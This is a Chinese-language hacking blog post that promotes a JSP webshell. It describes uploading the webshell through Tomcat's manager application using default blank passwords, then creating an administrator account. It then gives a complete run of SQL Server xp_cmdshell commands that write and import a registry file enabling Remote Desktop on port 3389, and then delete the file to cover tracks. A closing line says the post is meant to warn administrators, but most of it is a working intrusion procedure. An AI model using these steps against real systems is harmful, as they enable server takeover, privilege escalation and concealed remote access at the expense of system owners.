一款不错的jsp木马,jshell最近发现修改版很多,而且功能也强大了好多。
首先介绍一下如何上载这款jsp木马,现在的jsp应用大多以tomcat发布,tomcat默认有两个管理应用,分别是admin和manager/html,如果在软件发布的时候没有更改密码或删除应用,就会造成很大的安全隐患,例如这两个应用的默认密码都为空,登录manager后,可以创建上传context应用,如果我们把这款jsp上传的话,基本上整个系统都在我们的掌控之下。
可以执行系统命令,这时可以随便添加一个用户到系统中,然后把该用户添加到administrators用户组中,拿到超级权限,这时可以看看是否开通了3389端口,没开的话可以
//拿到sqlserver管理员密码时 “>”表示覆盖写入,“>>”表示追加写入 exec master.dbo.xp_cmdshell 'echo Windows Registry Editor Version 5.00 >3389.reg' exec master.dbo.xp_cmdshell 'echo. >>3389.reg' exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg' exec master.dbo.xp_cmdshell 'echo "fDenyTSConnections"=dword:00000000 >>3389.reg' exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg' exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg' exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg' exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg' //执行注册文件 exec master.dbo.xp_cmdshell 'regedit /s 3389.reg' //毁尸灭迹 exec master.dbo.xp_cmdshell 'del 3389.reg'
远程登录进去,呵呵,“为所欲为”
本篇只为交流,希望能引起管理员的重视,减少软件的安全隐患。特别是在软件不存在sql注入的情况下,往往令人费解,他是怎么突入进来了,通过tomcat这种漏洞或者算是管理员的疏忽,往往比sql注入更容易突破进来,而且危害也远远大于sql注入。